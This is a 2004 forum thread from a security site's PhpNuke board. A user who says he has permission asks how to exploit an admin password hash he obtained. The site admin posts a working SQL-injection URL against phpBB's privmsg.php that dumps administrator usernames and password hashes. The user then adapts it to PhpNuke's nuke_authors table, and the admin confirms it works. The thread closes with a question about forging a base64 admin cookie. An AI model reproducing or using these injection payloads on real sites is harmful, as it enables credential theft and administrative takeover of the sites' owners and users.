 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
Application of exploit... |
 |
 Posted: Tue May 25, 2004 11:12 pm |
 |
|
| Phage1971 |
| Beginner |
 |
|
| Joined: May 25, 2004 |
| Posts: 3 |
|
|
|
 |
|
 |
|
OK, heres where I'm stuck.
I've been able to grab the GodAdmin login and MD5 hash from a phpnuke based server. (This is all being done with permission, two different versions) Outside of brute force hacking (tried using mdcrack, but it demands that md5 hashes be 16bit (32 char length) and these are only 25...) How can this be utilized?
Before you respond, I've tried the login:passhash:en encode in base64, and tag it on the admin=, but I sill get blocked by the good old security code generator (that dumb lil number thing on the bottom).
So, guess what i need is a newbie guide to wtf im doing wrong.  |
|
|
|
|
|
|
|
|
| Posted: Tue May 25, 2004 11:33 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
First of all, that was my advisory #13 (seems unlucky ) and i made
little mistake, so its true, that you got only 25 first chars from actual md5 hash.
This is the query, which will give out all 32 chars:
http://localhost/phpbb2/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20username,null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,user_password%20FROM%20phpbb_users%20WHERE%20user_level=1%20LIMIT%201/* |
|
|
|
|
|
|
|
|
| Posted: Wed May 26, 2004 1:39 am |
|
|
| Phage1971 |
| Beginner |
|
|
| Joined: May 25, 2004 |
| Posts: 3 |
|
|
|
|
|
|
|
So...For phpnuke, would it be
| Code: | http://localhost/nuke69j1/modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,pwd%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*
|
??? |
|
|
|
|
| Posted: Wed May 26, 2004 12:53 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| Yes, this one must work in this time properly. |
|
|
|
|
| Posted: Wed May 26, 2004 7:48 pm |
|
|
| Phage1971 |
| Beginner |
|
|
| Joined: May 25, 2004 |
| Posts: 3 |
|
|
|
|
|
|
|
| ok, then...Whats the proper way to encode in Base64 and utilize that Base64Hash? Examples? |
|
|
|
|
| Posted: Wed May 26, 2004 9:47 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
|
|
|
|
www.waraxe.us Forum Index -> PhpNuke
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 278
Members: 0
Total: 278
